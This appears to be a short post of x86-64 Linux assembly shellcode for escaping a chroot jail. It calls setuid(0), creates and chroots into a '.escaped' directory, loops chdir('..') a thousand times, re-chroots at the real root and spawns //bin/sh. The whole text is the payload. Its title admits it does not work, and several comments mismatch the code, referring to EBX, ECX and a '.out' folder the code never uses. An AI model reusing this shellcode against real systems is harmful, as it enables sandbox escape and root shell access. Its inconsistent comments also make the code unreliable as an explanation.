Chroot Escape x64 (Should be working but isn't...)

1. global _start
2. _start:
3.     xor rax, rax
4.     xor rdi, rdi
5.     xor rsi, rsi
6.     xor r10, r10
7.     xor r9, r9
8.     xor r8, r8
9.  
10.     mov al, 69h         ;// Syscall for SETUID
11.                     ;// RDI is 0 for setuid(0)
12.     syscall             ;// Call the kernel
13.  
14.     xor rax, rax            ;// EAX should be 0 for successful setuid, but it may be -1 on error. This is faster than test/jnz
15.     mov al, 53h         ;// Syscall for MKDIR
16.     push rdi            ;// push 0x000000 for null terminator
17.     mov rdi, 0x646570616373652e ;// ".escaped" in reverse
18.     push rdi
19.     mov rdi, rsp            ;// pointer to ".escaped" folder string
20.     xor rcx, rcx
21.     mov cx, 755o
22.     mov rsi, rcx            ;// rwxr-xr-x
23.     syscall
24.  
25.     xor rax, rax
26.     xor rcx, rcx            ;// O_RDONLY (000000000)
27.     mov al, 0x2e            ;// Open "." string
28.     push rax            ;// Push "\x00\x00\x00\x00\x00\x00\x00." onto stack
29.     mov rdi, rsp            ;// Set RDI to the string pointer
30.     mov al, 2h          ;// Syscall for open
31.     syscall
32.  
33.     mov r15, rax            ;// Move File Descriptor into R15 for later
34.     xor rdi, rdi
35.     push rdi            ;// push 0x000000 for null terminator
36.     mov rdi, 0x646570616373652e ;// ".escaped" in reverse
37.     push rdi
38.     mov rdi, rsp            ;// pointer to ".escaped" folder string
39.     xor rax, rax
40.     mov al, 0xa1            ;// Syscall for CHROOT
41.     syscall
42.  
43.     xor rax, rax
44.     mov rdi, r15            ;// move ".escaped" File Descriptor we saved earlier into RBX
45.     mov al, 51h         ;// Syscall for FCHDIR
46.     syscall
47.    
48.     xor rax, rax
49.     mov al, 3h          ;// Syscall for CLOSE
50.     mov rdi, r15            ;// Move the File Descriptor for ".out" into
51.     syscall
52.  
53.     xor rax, rax
54.     mov ax, 0x2e2e          ;// move ".." to stack
55.     push rax
56.     mov rdi, rsp            ;// EBX now contains a pointer to "..\x00\x00\x00\x00\x00\x00" in human-readable format
57.     xor r15, r15
58.     mov r15w, 1000          ;// loop 1000 times
59.     nop
60. loop1:  xor rax, rax            ;// return value should always be 0, but just in case...
61.     mov al, 12          ;// Syscall for CHDIR
62.     syscall
63.     dec r15
64.     test r15, r15
65.     jnz loop1
66.  
67.     xor rcx, rcx
68.     mov cl, 0x2e            ;// Set ECX to "."
69.     push rcx            ;// Push "." onto stack
70.     mov rdi, rsp            ;// Pointer to ".out" folder string
71.     mov al, 0xa1            ;// Syscall for CHROOT
72.     syscall
73.  
74.     nop
75.  
76.     xor rax, rax
77.     push rax
78.     mov r15, 0x68732f6e69622f2f ;// "hs/nib//" for "//bin/sh" to execute. Don't asume bash or dash just in case.
79.     push r15
80.     mov rdi, rsp            ;// Set the char* parameter to the file name //bin/sh
81.     push rax            ;// push 0x00000000
82.     mov rdx, rsp            ;// NULL for the Environment...
83.     push rdi            ;// Push the address of "//bin/sh" for the list of arguments. Executing '//bin/sh //bin/sh'
84.     mov rsi, rsp
85.     mov al, 3bh         ;// Syscall for EXECVE
86.     syscall
87.  
88.     xor rax, rax
89.     xor rdi, rdi
90.     mov dl, 123d
91.     mov al, 3ch
92.     syscall